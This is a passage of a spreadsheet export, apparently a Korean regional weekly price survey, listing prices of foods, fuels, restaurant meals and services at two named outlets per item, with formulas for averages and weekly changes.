A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: 2 | E75: 2 | F75: 13500 | G75: 13500 | H75: 0 | I75: 옥룡이용원 | J75: 14000 | K75: 14000 | L75: 0 | M75: 숲샘이용원 | N75: 13000 | O75: 13000 | P75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 2 | E76: 2 | F76: 32500 | G76: 32500 | H76: 0 | I76: 모아헤어삽 | J76: 30000 | K76: 30000 | L76: 0 | M76: 헤어터치 | N76: 35000 | O76: 35000 | P76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 2 | E77: 2 | F77: 8000 | G77: 8000 | H77: 0 | I77: 베스파 | J77: 9000 | K77: 9000 | L77: 0 | M77: 대호탕 | N77: 7000 | O77: 7000 | P77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 2 | E78: 2 | F78: 0 | G78: 0 | H78: 0 | P78: 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: 2 | E79: 2 | F79: 37500 | G79: 37500 | H79: 0 | I79: 롯데모텔 | J79: 35000 | K79: 35000 | L79: 0 | M79: J1모텔 | N79: 40000 | O79: 40000 | P79: 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 2 | E80: 2 | F80: 0 | G80: 0 | H80: 0 | L80: 0 | P80: 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: 2 | E81: 2 | F81: 1400 | G81: 1400 | H81: 0 | I81: 아이센스 | J81: 1500 | K81: 1500 | L81: 0 | M81: 인터빌리아 | N81: 1300 | O81: 1300 | P81: 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 2 | E82: 2 | F82: 6000 | G82: 6000 | H82: 0 | I82: CJ택배 | J82: 6000 | K82: 6000 | L82: 0 | M82: 한진택배 | N82: 6000 | O82: 6000 | P82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 2 | E83: 2 | F83: 0 | G83: 0 | H83: 0 | L83: 0 | P83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 2 | E84: 2 | F84: 0 | G84: 0 | H84: 0 | L84: 0 | P84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: =COUNTIF(K86,"<>0")+COUNTIF(O86,"<>0") -> 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 6050 | G86: =IF(E86=0,0,SUM(K86,O86)/E86) -> 6050 | H86: =G86-F86 -> 0 | I86: 참마트 | J86: 6200 | K86: 6200 | L86: 0 | M86: 백운마트 | N86: 5900 | O86: 5900 | P86: 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: =COUNTIF(J87,"<>0")+COUNTIF(N87,"<>0") -> 2 | E87: 2 | F87: =IF(D87=0,0,SUM(J87,N87)/D87) -> 1475 | G87: 1475 | H87: =G87-F87 -> 0 | I87: 참마트 | J87: 1450 | K87: 1450 | L87: 0 | M87: 백운마트 | N87: 1500 | O87: 1500 | P87: 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 2 | E88: 2 | F88: 1200 | G88: 1200 | H88: 0 | I88: 참마트 | J88: 1200 | K88: 1200 | L88: 0 | M88: 백운마트 | N88: 1200 | O88: 1200 | P88: 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 2 | E89: 2 | F89: 8850 | G89: 8850 | H89: 0 | I89: 참마트 | J89: 9500 | K89: 9500 | L89: 0 | M89: 백운마트 | N89: 8200 | O89: 8200 | P89: 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 2 | E90: 2 | F90: 2900 | G90: 2900 | H90: 0 | I90: 참마트 | J90: 3300 | K90: 3300 | L90: 0 | M90: 백운마트 | N90: 2500 | O90: 2500 | P90: 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 2 | E91: 2 | F91: 425 | G91: 425 | H91: 0 | I91: 참마트 | J91: 400 | K91: 400 | L91: 0 | M91: 백운마트 | N91: 450 | O91: 450 | P91: 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 2 | E92: 2 | F92: 1800 | G92: 1800 | H92: 0 | I92: 참마트 | J92: 1950 | K92: 1950 | L92: 0 | M92: 백운마트 | N92: 1650 | O92: 1650 | P92: 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 2 | E93: 2 | F93: 1600 | G93: 1600 | H93: 0 | I93: 참마트 | J93: 1700 | K93: 1700 | L93: 0 | M93: 백운마트 | N93: 1500 | O93: 1500 | P93: 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: 2 | E94: 2 | F94: 1350 | G94: 1350 | H94: 0 | I94: 원예농협백운점 | J94: 1400 | K94: 1400 | L94: 0 | M94: 사곡주유소 | N94: 1300 | O94: 1300 | P94: 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: 2 | E95: 2 | F95: 1586.5 | G95: 1570 | H95: -16.5 | I95: 원예농협백운점 | J95: 1595 | K95: 1595 | L95: 0 | M95: 사곡주유소 | N95: 1578 | O95: 1545 | P95: -33
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: 2 | E96: 2 | F96: 1627 | G96: 1620 | H96: -7 | I96: 원예농협백운점 | J96: 1645 | K96: 1645 | L96: 0 | M96: 사곡주유소 | N96: 1609 | O96: 1595 | P96: -14
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 2 | E97: 2 | F97: 145805 | G97: 145805 | H97: 0 | I97: 엘리제피아노 | J97: 141610 | K97: 141610 | L97: 0 | M97: 목원피아노 | N97: 150000 | O97: 150000 | P97: 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 2 | E98: 2 | F98: 135000 | G98: 135000 | H98: 0 | I98: 수채화 | J98: 130000 | K98: 130000 | L98: 0 | M98: 색채학 | N98: 140000 | O98: 140000 | P98: 0

Sheet 중마동1
A2: 주간 물간동향 (중마동1)
M3: 조사자 : 전미정
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(농협하나로마트) | M4: 조 사 2 지 역(홈플러스)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg(풍광수토) | D7: =COUNTIF(J7,"<>0")+COUNTIF(N7,"<>0") -> 2 | E7: =COUNTIF(K7,"<>0")+COUNTIF(O7,"<>0") -> 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 61,950 | G7: =IF(0,0,SUM(K7,O7)/E7) -> 61,950 | H7: =G7-F7 -> 0 | I7: 농협하나로마트 | J7: 64000 | K7: 64000 | L7: 0 | M7: 홈플러스 | N7: 59900 | O7: 59900 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(N8,"<>0") -> 2 | E8: =COUNTIF(K8,"<>0")+COUNTIF(O8,"<>0") -> 2 | F8: =IF(D8=0,0,SUM(J8,N8)/D8) -> 673 | G8: =IF(E8=0,0,SUM(K8,O8)/E8) -> 648 | H8: =G8-F8 -> -25 | I8: 농협하나로마트 | J8: 600 | K8: 600 | L8: =K8-J8 -> 0 | M8: 홈플러스 | N8: 745 | O8: 695 | P8: =O8-N8 -> -50
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: =COUNTIF(J9,"<>0")+COUNTIF(N9,"<>0") -> 2 | E9: =COUNTIF(K9,"<>0")+COUNTIF(O9,"<>0") -> 2 | F9: =IF(D9=0,0,SUM(J9,N9)/D9) -> 8,650 | G9: =IF(E9=0,0,SUM(K9,O9)/E9) -> 6,710 | H9: =G9-F9 -> -1,940 | I9: 농협하나로마트 | J9: 8,400 | K9: 4,450 | L9: =K9-J9 -> -3,950 | M9: 홈플러스 | N9: 8,900 | O9: 8,970 | P9: =O9-N9 -> 70
A10: 4 | B10: 양상추 | C10: 상품1개(500g) | D10: =COUNTIF(J10,"<>0")+COUNTIF(N10,"<>0") -> 2 | E10: =COUNTIF(K10,"<>0")+COUNTIF(O10,"<>0") -> 2 | F10: =IF(D10=0,0,SUM(J10,N10)/D10) -> 2,485 | G10: =IF(E10=0,0,SUM(K10,O10)/E10) -> 2,745 | H10: =G10-F10 -> 260 | I10: 농협하나로마트 | J10: 2,980 | K10: 2,500 | L10: =K10-J10 -> -480 | M10: 홈플러스 | N10: 1,990 | O10: 2,990 | P10: =O10-N10 -> 1,000
A11: 5 | B11: 애호박 | C11: 상품1개(250~300g) | D11: =COUNTIF(J11,"<>0")+COUNTIF(N11,"<>0") -> 2 | E11: =COUNTIF(K11,"<>0")+COUNTIF(O11,"<>0") -> 2 | F11: =IF(D11=0,0,SUM(J11,N11)/D11) -> 1,735 | G11: =IF(E11=0,0,SUM(K11,O11)/E11) -> 1,645 | H11: =G11-F11 -> -90 | I11: 농협하나로마트 | J11: 1,680 | K11: 1,800 | L11: =K11-J11 -> 120 | M11: 홈플러스 | N11: 1,790 | O11: 1,490 | P11: =O11-N11 -> -300
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: =COUNTIF(J12,"<>0")+COUNTIF(N12,"<>0") -> 2 | E12: =COUNTIF(K12,"<>0")+COUNTIF(O12,"<>0") -> 2 | F12: =IF(D12=0,0,SUM(J12,N12)/D12) -> 13,125 | G12: =IF(E12=0,0,SUM(K12,O12)/E12) -> 19,598 | H12: =G12-F12 -> 6,473 | I12: 농협하나로마트 | J12: 8,800 | K12: 12,195 | L12: =K12-J12 -> 3,395 | M12: 홈플러스 | N12: 17,450 | O12: 27,000 | P12: =O12-N12 -> 9,550
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: =COUNTIF(J13,"<>0")+COUNTIF(N13,"<>0") -> 2 | E13: =COUNTIF(K13,"<>0")+COUNTIF(O13,"<>0") -> 2 | F13: =IF(D13=0,0,SUM(J13,N13)/D13) -> 4,350 | G13: =IF(E13=0,0,SUM(K13,O13)/E13) -> 4,350 | H13: =G13-F13 -> 0 | I13: 농협하나로마트 | J13: 3,500 | K13: 3,500 | L13: =K13-J13 -> 0 | M13: 홈플러스 | N13: 5,200 | O13: 5,200 | P13: =O13-N13 -> 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: =COUNTIF(J14,"<>0")+COUNTIF(N14,"<>0") -> 2 | E14: =COUNTIF(K14,"<>0")+COUNTIF(O14,"<>0") -> 2 | F14: =IF(D14=0,0,SUM(J14,N14)/D14) -> 5,945 | G14: =IF(E14=0,0,SUM(K14,O14)/E14) -> 3,995 | H14: =G14-F14 -> -1,950 | I14: 농협하나로마트 | J14: 6,900 | K14: 3,500 | L14: =K14-J14 -> -3,400 | M14: 홈플러스 | N14: 4,990 | O14: 4,490 | P14: =O14-N14 -> -500
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: =COUNTIF(J15,"<>0")+COUNTIF(N15,"<>0") -> 2 | E15: =COUNTIF(K15,"<>0")+COUNTIF(O15,"<>0") -> 2 | F15: =IF(D15=0,0,SUM(J15,N15)/D15) -> 12,350 | G15: =IF(E15=0,0,SUM(K15,O15)/E15) -> 11,135 | H15: =G15-F15 -> -1,215 | I15: 농협하나로마트 | J15: 8,100 | K15: 9,800 | L15: =K15-J15 -> 1,700 | M15: 홈플러스 | N15: 16,600 | O15: 12,470 | P15: =O15-N15 -> -4,130
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: =COUNTIF(J16,"<>0")+COUNTIF(N16,"<>0") -> 2 | E16: =COUNTIF(K16,"<>0")+COUNTIF(O16,"<>0") -> 2 | F16: =IF(D16=0,0,SUM(J16,N16)/D16) -> 8,445 | G16: =IF(E16=0,0,SUM(K16,O16)/E16) -> 8,445 | H16: =G16-F16 -> 0 | I16: 농협하나로마트 | J16: 8,900 | K16: 6,900 | L16: =K16-J16 -> -2,000 | M16: 홈플러스 | N16: 7,990 | O16: 9,990 | P16: =O16-N16 -> 2,000
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: =COUNTIF(J17,"<>0")+COUNTIF(N17,"<>0") -> 2 | E17: =COUNTIF(K17,"<>0")+COUNTIF(O17,"<>0") -> 2 | F17: =IF(D17=0,0,SUM(J17,N17)/D17) -> 3,620 | G17: =IF(E17=0,0,SUM(K17,O17)/E17) -> 3,620 | H17: =G17-F17 -> 0 | I17: 농협하나로마트 | J17: 3,500 | K17: 3,500 | L17: =K17-J17 -> 0 | M17: 홈플러스 | N17: 3,740 | O17: 3,740 | P17: =O17-N17 -> 0
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: =COUNTIF(J18,"<>0")+COUNTIF(N18,"<>0") -> 2 | E18: =COUNTIF(K18,"<>0")+COUNTIF(O18,"<>0") -> 2 | F18: =IF(D18=0,0,SUM(J18,N18)/D18) -> 2,845 | G18: =IF(E18=0,0,SUM(K18,O18)/E18) -> 3,095 | H18: =G18-F18 -> 250 | I18: 농협하나로마트 | J18: 2,700 | K18: 2,200 | L18: =K18-J18 -> -500 | M18: 홈플러스 | N18: 2,990 | O18: 3,990 | P18: =O18-N18 -> 1,000
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: =COUNTIF(J19,"<>0")+COUNTIF(N19,"<>0") -> 2 | E19: =COUNTIF(K19,"<>0")+COUNTIF(O19,"<>0") -> 2 | F19: =IF(D19=0,0,SUM(J19,N19)/D19) -> 2,165 | G19: =IF(E19=0,0,SUM(K19,O19)/E19) -> 2,150 | H19: =G19-F19 -> -15 | I19: 농협하나로마트 | J19: 1,980 | K19: 1,950 | L19: =K19-J19 -> -30 | M19: 홈플러스 | N19: 2,350 | O19: 2,350 | P19: =O19-N19 -> 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: =COUNTIF(J20,"<>0")+COUNTIF(N20,"<>0") -> 2 | E20: =COUNTIF(K20,"<>0")+COUNTIF(O20,"<>0") -> 2 | F20: =IF(D20=0,0,SUM(J20,N20)/D20) -> 2,031 | G20: =IF(E20=0,0,SUM(K20,O20)/E20) -> 4,374 | H20: =G20-F20 -> 2,343 | I20: 농협하나로마트 | J20: 1,577 | K20: 4,500 | L20: =K20-J20 -> 2,923 | M20: 홈플러스 | N20: 2,485 | O20: 4,248 | P20: =O20-N20 -> 1,763
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: =COUNTIF(J21,"<>0")+COUNTIF(N21,"<>0") -> 2 | E21: =COUNTIF(K21,"<>0")+COUNTIF(O21,"<>0") -> 2 | F21: =IF(D21=0,0,SUM(J21,N21)/D21) -> 4,000 | G21: =IF(E21=0,0,SUM(K21,O21)/E21) -> 4,375 | H21: =G21-F21 -> 375 | I21: 농협하나로마트 | J21: 5,200 | K21: 4,830 | L21: =K21-J21 -> -370 | M21: 홈플러스 | N21: 2,800 | O21: 3,920 | P21: =O21-N21 -> 1,120
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: =COUNTIF(J22,"<>0")+COUNTIF(N22,"<>0") -> 2 | E22: =COUNTIF(K22,"<>0")+COUNTIF(O22,"<>0") -> 2 | F22: =IF(D22=0,0,SUM(J22,N22)/D22) -> 4,870 | G22: =IF(E22=0,0,SUM(K22,O22)/E22) -> 4,870 | H22: =G22-F22 -> 0 | I22: 농협하나로마트 | J22: 3,750 | K22: 3,750 | L22: =K22-J22 -> 0 | M22: 홈플러스 | N22: 5,990 | O22: 5,990 | P22: =O22-N22 -> 0
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: =COUNTIF(J23,"<>0")+COUNTIF(N23,"<>0") -> 2 | E23: =COUNTIF(K23,"<>0")+COUNTIF(O23,"<>0") -> 2 | F23: =IF(D23=0,0,SUM(J23,N23)/D23) -> 68,670 | G23: =IF(E23=0,0,SUM(K23,O23)/E23) -> 65,670 | H23: =G23-F23 -> -3,000 | I23: 농협하나로마트 | J23: 55,800 | K23: 47,400 | L23: =K23-J23 -> -8,400 | M23: 홈플러스 | N23: 81,540 | O23: 83,940 | P23: =O23-N23 -> 2,400
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: =COUNTIF(J24,"<>0")+COUNTIF(N24,"<>0") -> 1 | E24: =COUNTIF(K24,"<>0")+COUNTIF(O24,"<>0") -> 1 | F24: =IF(D24=0,0,SUM(J24,N24)/D24) -> 22,200 | G24: =IF(E24=0,0,SUM(K24,O24)/E24) -> 22,200 | H24: =G24-F24 -> 0 | I24: 농협하나로마트 | J24: 0 | K24: 0 | L24: =K24-J24 -> 0 | M24: 홈플러스 | N24: 22,200 | O24: 22,200 | P24: =O24-N24 -> 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: =COUNTIF(J25,"<>0")+COUNTIF(N25,"<>0") -> 2 | E25: =COUNTIF(K25,"<>0")+COUNTIF(O25,"<>0") -> 2 | F25: =IF(D25=0,0,SUM(J25,N25)/D25) -> 19,110 | G25: =IF(E25=0,0,SUM(K25,O25)/E25) -> 22,275 | H25: =G25-F25 -> 3,165 | I25: 농협하나로마트 | J25: 16080 | K25: 16080 | L25: =K25-J25 -> 0 | M25: 홈플러스 | N25: 22140 | O25: 28470 | P25: =O25-N25 -> 6,330
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: =COUNTIF(J26,"<>0")+COUNTIF(N26,"<>0") -> 2 | E26: =COUNTIF(K26,"<>0")+COUNTIF(O26,"<>0") -> 2 | F26: =IF(D26=0,0,SUM(J26,N26)/D26) -> 7,995 | G26: =IF(E26=0,0,SUM(K26,O26)/E26) -> 7,895 | H26: =G26-F26 -> -100 | I26: 농협하나로마트 | J26: 7000 | K26: 7000 | L26: =K26-J26 -> 0 | M26: 홈플러스 | N26: 8990 | O26: 8790 | P26: =O26-N26 -> -200
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: =COUNTIF(J27,"<>0")+COUNTIF(N27,"<>0") -> 2 | E27: =COUNTIF(K27,"<>0")+COUNTIF(O27,"<>0") -> 2 | F27: =IF(D27=0,0,SUM(J27,N27)/D27) -> 7,795 | G27: =IF(E27=0,0,SUM(K27,O27)/E27) -> 7,795 | H27: =G27-F27 -> 0 | I27: 농협하나로마트 | J27: 8,100 | K27: 8,100 | L27: =K27-J27 -> 0 | M27: 홈플러스 | N27: 7,490 | O27: 7,490 | P27: =O27-N27 -> 0
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: =COUNTIF(J28,"<>0")+COUNTIF(N28,"<>0") -> 2 | E28: =COUNTIF(K28,"<>0")+COUNTIF(O28,"<>0") -> 2 | F28: =IF(D28=0,0,SUM(J28,N28)/D28) -> 3,000 | G28: =IF(E28=0,0,SUM(K28,O28)/E28) -> 3,000 | H28: =G28-F28 -> 0 | I28: 농협하나로마트 | J28: 2,500 | K28: 2,500 | L28: 0 | M28: 홈플러스 | N28: 3,500 | O28: 3,500 | P28: =O28-N28 -> 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: =COUNTIF(J29,"<>0")+COUNTIF(N29,"<>0") -> 2 | E29: =COUNTIF(K29,"<>0")+COUNTIF(O29,"<>0") -> 2 | F29: =IF(D29=0,0,SUM(J29,N29)/D29) -> 9,700 | G29: =IF(E29=0,0,SUM(K29,O29)/E29) -> 11,900 | H29: =G29-F29 -> 2,200 | I29: 농협하나로마트 | J29: 12,800 | K29: 12,800 | L29: =K29-J29 -> 0 | M29: 홈플러스 | N29: 6,600 | O29: 11,000 | P29: =O29-N29 -> 4,400
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: =COUNTIF(J30,"<>0")+COUNTIF(N30,"<>0") -> 2 | E30: =COUNTIF(K30,"<>0")+COUNTIF(O30,"<>0") -> 2 | F30: =IF(D30=0,0,SUM(J30,N30)/D30) -> 4,250 | G30: =IF(E30=0,0,SUM(K30,O30)/E30) -> 3,740 | H30: =G30-F30 -> -510 | I30: 농협하나로마트 | J30: 3,500 | K30: 3,980 | L30: 0 | M30: 홈플러스 | N30: 5,000 | O30: 3,500 | P30: =O30-N30 -> -1,500
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: =COUNTIF(J31,"<>0")+COUNTIF(N31,"<>0") -> 2 | E31: =COUNTIF(K31,"<>0")+COUNTIF(O31,"<>0") -> 2 | F31: =IF(D31=0,0,SUM(J31,N31)/D31) -> 2,750 | G31: =IF(E31=0,0,SUM(K31,O31)/E31) -> 2,950 | H31: =G31-F31 -> 200 | I31: 농협하나로마트 | J31: 2,500 | K31: 2,900 | L31: =K31-J31 -> 400 | M31: 홈플러스 | N31: 3,000 | O31: 3,000 | P31: =O31-N31 -> 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: =COUNTIF(J32,"<>0")+COUNTIF(N32,"<>0") -> 2 | E32: =COUNTIF(K32,"<>0")+COUNTIF(O32,"<>0") -> 2 | F32: =IF(D32=0,0,SUM(J32,N32)/D32) -> 5,700 | G32: =IF(E32=0,0,SUM(K32,O32)/E32) -> 5,700 | H32: =G32-F32 -> 0 | I32: 농협하나로마트 | J32: 5,700 | K32: 5,700 | L32: =K32-J32 -> 0 | M32: 홈플러스 | N32: 5,700 | O32: 5,700 | P32: =O32-N32 -> 0
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: =COUNTIF(J33,"<>0")+COUNTIF(N33,"<>0") -> 2 | E33: =COUNTIF(K33,"<>0")+COUNTIF(O33,"<>0") -> 2 | F33: =IF(D33=0,0,SUM(J33,N33)/D33) -> 4,680 | G33: =IF(E33=0,0,SUM(K33,O33)/E33) -> 4,680 | H33: =G33-F33 -> 0 | I33: 농협하나로마트 | J33: 5,860 | K33: 5,860 | L33: =K33-J33 -> 0 | M33: 홈플러스 | N33: 3,500 | O33: 3,500 | P33: 0
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: =COUNTIF(J34,"<>0")+COUNTIF(N34,"<>0") -> 2 | E34: =COUNTIF(K34,"<>0")+COUNTIF(O34,"<>0") -> 2 | F34: =IF(D34=0,0,SUM(J34,N34)/D34) -> 93,900 | G34: =IF(E34=0,0,SUM(K34,O34)/E34) -> 93,900 | H34: =G34-F34 -> 0 | I34: 농협하나로마트 | J34: 102,000 | K34: 102,000 | L34: 0 | M34: 홈플러스 | N34: 85,800 | O34: 85,800 | P34: =O34-N34 -> 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(N36,"<>0") -> 2 | E36: =COUNTIF(K36,"<>0")+COUNTIF(O36,"<>0") -> 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 10,500 | G36: =IF(E36=0,0,SUM(K36,O36)/E36) -> 10,500 | H36: =G36-F36 -> 0 | I36: 큰집설렁탕 | J36: 10,000 | K36: 10,000 | L36: =K36-J36 -> 0 | M36: 서울깍두기 | N36: 11,000 | O36: 11,000 | P36: =O36-N36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(N37,"<>0") -> 2 | E37: =COUNTIF(K37,"<>0")+COUNTIF(O37,"<>0") -> 2 | F37: =IF(D37=0,0,SUM(J37,N37)/D37) -> 9,500 | G37: =IF(E37=0,0,SUM(K37,O37)/E37) -> 9,500 | H37: =G37-F37 -> 0 | I37: 옥천냉면 | J37: 9,000 | K37: 9,000 | L37: =K37-J37 -> 0 | M37: 은성면옥 | N37: 10,000 | O37: 10,000 | P37: =O37-N37 -> 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: =COUNTIF(J38,"<>0")+COUNTIF(N38,"<>0") -> 2 | E38: =COUNTIF(K38,"<>0")+COUNTIF(O38,"<>0") -> 2 | F38: =IF(D38=0,0,SUM(J38,N38)/D38) -> 7,500 | G38: =IF(E38=0,0,SUM(K38,O38)/E38) -> 7,500 | H38: =G38-F38 -> 0 | I38: 백운마루 | J38: 7,000 | K38: 7,000 | L38: =K38-J38 -> 0 | M38: 고을팥죽 | N38: 8,000 | O38: 8,000 | P38: =O38-N38 -> 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: =COUNTIF(J39,"<>0")+COUNTIF(N39,"<>0") -> 2 | E39: =COUNTIF(K39,"<>0")+COUNTIF(O39,"<>0") -> 2 | F39: =IF(D39=0,0,SUM(J39,N39)/D39) -> 13,500 | G39: =IF(E39=0,0,SUM(K39,O39)/E39) -> 13,500 | H39: =G39-F39 -> 0 | I39: 청주본가 | J39: 13,000 | K39: 13,000 | L39: =K39-J39 -> 0 | M39: 은성면옥 | N39: 14,000 | O39: 14,000 | P39: =O39-N39 -> 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: =COUNTIF(J40,"<>0")+COUNTIF(N40,"<>0") -> 2 | E40: =COUNTIF(K40,"<>0")+COUNTIF(O40,"<>0") -> 2 | F40: =IF(D40=0,0,SUM(J40,N40)/D40) -> 14,500 | G40: =IF(E40=0,0,SUM(K40,O40)/E40) -> 14,500 | H40: =G40-F40 -> 0 | I40: 고려삼계탕 | J40: 14,000 | K40: 14,000 | L40: =K40-J40 -> 0 | M40: 석암정 | N40: 15,000 | O40: 15,000 | P40: =O40-N40 -> 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: =COUNTIF(J41,"<>0")+COUNTIF(N41,"<>0") -> 2 | E41: =COUNTIF(K41,"<>0")+COUNTIF(O41,"<>0") -> 2 | F41: =IF(D41=0,0,SUM(J41,N41)/D41) -> 8,500 | G41: =IF(E41=0,0,SUM(K41,O41)/E41) -> 8,500 | H41: =G41-F41 -> 0 | I41: 남이식당 | J41: 8,000 | K41: 8,000 | L41: =K41-J41 -> 0 | M41: 한일식당 | N41: 9,000 | O41: 9,000 | P41: =O41-N41 -> 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: =COUNTIF(J42,"<>0")+COUNTIF(N42,"<>0") -> 2 | E42: =COUNTIF(K42,"<>0")+COUNTIF(O42,"<>0") -> 2 | F42: =IF(D42=0,0,SUM(J42,N42)/D42) -> 9,000 | G42: =IF(E42=0,0,SUM(K42,O42)/E42) -> 9,000 | H42: =G42-F42 -> 0 | I42: 시골밥상 | J42: 8,000 | K42: 8,000 | L42: =K42-J42 -> 0 | M42: 한일식당 | N42: 10,000 | O42: 10,000 | P42: =O42-N42 -> 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: =COUNTIF(J43,"<>0")+COUNTIF(N43,"<>0") -> 2 | E43: =COUNTIF(K43,"<>0")+COUNTIF(O43,"<>0") -> 2 | F43: =IF(D43=0,0,SUM(J43,N43)/D43) -> 21,000 | G43: =IF(E43=0,0,SUM(K43,O43)/E43) -> 21,000 | H43: =G43-F43 -> 0 | I43: 금정불고기 | J43: 18,000 | K43: 18,000 | L43: =K43-J43 -> 0 | M43: 한우관 | N43: 24,000 | O43: 24,000 | P43: =O43-N43 -> 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: =COUNTIF(J44,"<>0")+COUNTIF(N44,"<>0") -> 2 | E44: =COUNTIF(K44,"<>0")+COUNTIF(O44,"<>0") -> 2 | F44: =IF(D44=0,0,SUM(J44,N44)/D44) -> 38,000 | G44: =IF(E44=0,0,SUM(K44,O44)/E44) -> 38,000 | H44: =G44-F44 -> 0 | I44: 한마음회관 | J44: 40,000 | K44: 40,000 | L44: =K44-J44 -> 0 | M44: 한우관 | N44: 36,000 | O44: 36,000 | P44: =O44-N44 -> 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: =COUNTIF(J45,"<>0")+COUNTIF(N45,"<>0") -> 2 | E45: =COUNTIF(K45,"<>0")+COUNTIF(O45,"<>0") -> 2 | F45: =IF(D45=0,0,SUM(J45,N45)/D45) -> 12,000 | G45: =IF(E45=0,0,SUM(K45,O45)/E45) -> 12,000 | H45: =G45-F45 -> 0 | I45: 거인초밥 | J45: 12000 | K45: 12000 | L45: =K45-J45 -> 0 | M45: 거북이초밥 | N45: 12,000 | O45: 12,000 | P45: =O45-N45 -> 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: =COUNTIF(J46,"<>0")+COUNTIF(N46,"<>0") -> 2 | E46: =COUNTIF(K46,"<>0")+COUNTIF(O46,"<>0") -> 2 | F46: =IF(D46=0,0,SUM(J46,N46)/D46) -> 18,500 | G46: =IF(E46=0,0,SUM(K46,O46)/E46) -> 18,500 | H46: =G46-F46 -> 0 | I46: 아주커치킨 | J46: 18,000 | K46: 18,000 | L46: =K46-J46 -> 0 | M46: 페리카나 | N46: 19,000 | O46: 19,000 | P46: =O46-N46 -> 0
